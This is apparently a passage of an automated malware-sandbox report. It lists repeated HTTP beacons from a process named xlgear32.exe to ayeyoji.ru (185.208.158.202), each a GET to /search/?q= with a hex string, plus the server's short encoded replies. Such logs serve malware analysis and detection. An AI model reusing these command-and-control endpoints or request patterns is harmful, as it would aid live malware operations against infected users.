                                                                        Data Ascii: 36c67b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765bb374f067b73256c0e0d50eca42cd7db01bfd328838e316b867c75aa5ea4ee75b7f43ec2f66943d798cff12deed909925c96a9c13d8508f21b750b6f75e29e465dbf467b089e5d04ae635c81530435b28e23b730f78b8ec84f4872d51e6577223e02c5ee9fde68de43f7ea7e7429284fb712612be76ee9fc9ac64d1631b293b65ac57ced6ac3d2ca4c80dba1ebba330a6c4c9357e2b0ed330e011edcfbc0548cc3e1ac74bd9f364972cb7965ea9e3d0a1de3a23b966bceb0f85a2be7050a187f421a6fa809818eb0ae45d9e4e6fc7bfc2fdd84a6ca09ee624a977970b36b523d23fd79e00cb5dbe39060253cad5705d3d537b84f88b2028604f10c4c3b6180dffd6a6eddd2a7e7bef3580c20500419ba8da06495ad57e7544314ee6dbd1ccf0ca589538724ffb742a802cb0d19278825ec58c2017086083f59fee060ea32894da107509de37ccf49a097e306f9c3103f35a45606e8c4fdab8a3f165e6959a7f0ed27a911c5b9be392218a3e7be62ba12030e138df0746c2a6a1a56ba1c5079b47d3ee0
                                                                        Nov 30, 2024 02:33:57.749596119 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:33:58.262341976 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:33:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:33:58.375155926 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:33:58.844825029 CET940INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:33:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 32 64 63 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 37 63 63 35 36 61 35 65 32 34 36 65 34 34 34 37 36 34 61 66 32 32 64 36 31 39 66 33 65 36 37 38 65 66 34 31 30 63 33 65 61 38 62 39 62 33 33 63 63 37 31 39 37 31 31 63 36 35 31 38 66 32 33 62 63 35 38 62 33 65 39 35 66 32 61 65 34 37 39 63 63 66 62 37 61 61 37 38 65 65 65 64 34 35 34 65 37 33 62 63 61 31 63 33 30 35 64 35 61 32 30 65 38 32 34 37 33 30 62 37 38 62 38 65 62 38 66 65 30 38 37 32 64 35 39 66 38 35 64 37 31 32 30 66 65 32 61 35 64 66 63 66 64 65 33 38 65 65 34 33 66 37 38 61 36 66 33 34 35 39 33 38 36 65 35 37 62 32 35 31 [TRUNCATED]
                                                                        Data Ascii: 2dc67b69c953804b26b565fe95b321bd19a55fc8fcff51e19ebbd55e903caff8de795874d8047d1e4dc2a30a152ffd6cd0729e97d59ad75f66ca83253defcd30bde41c87eae14fa398f26e410ad67cc56a5e246e444764af22d619f3e678ef410c3ea8b9b33cc719711c6518f23bc58b3e95f2ae479ccfb7aa78eeed454e73bca1c305d5a20e824730b78b8eb8fe0872d59f85d7120fe2a5dfcfde38ee43f78a6f3459386e57b2516b769ef98cbb967d275072a367aad5ecdc3af3929b0c80eb800b2a332b1dbca3073340fd535f511ecd2b4064fd23f18c050c5f465832bb0885ca1eadaabc03b23b579bae5149da3a2775bbe86f226a7ff85861fe61ce044824c6ed1b4c7fcc64b63a493ea3aaf74820e30a33cd638c39b00d55cb5390e1951cadc6f5a394c6080e28f292c7e4d10cac8b21013fdddb1edc3357a73f93d81c41b0a4795a0c1034c4fd77c6b58324afdd0d7cbeec8519a366f4efe7c3f8320b3d1927b8b4ac68f3e1501629df79eda0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449746185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:33:59.198496103 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:00.572812080 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449752185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:00.806781054 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:02.227019072 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449758185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:02.467372894 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:03.916752100 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:34:04.031367064 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:04.493899107 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:34:04.608022928 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:05.065917969 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449764185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:05.415508986 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:06.739707947 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449770185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:06.978771925 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:08.320300102 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449771185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:08.556945086 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:09.935836077 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449777185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:10.182204008 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:11.556437969 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449783185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:11.791414022 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:13.226771116 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449788185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:13.462992907 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:14.944133997 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449790185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:15.181719065 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:16.553778887 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449795185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:16.791323900 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:18.165915012 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.449800185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:18.401058912 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:19.841476917 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.449803185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:20.089040995 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:21.511260986 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:34:21.624417067 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:22.101311922 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.449809185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:22.510927916 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:23.884879112 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.449814185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:24.176803112 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:25.556432009 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.449820185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:25.791766882 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:27.189121008 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.449825185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:27.432925940 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:28.850276947 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
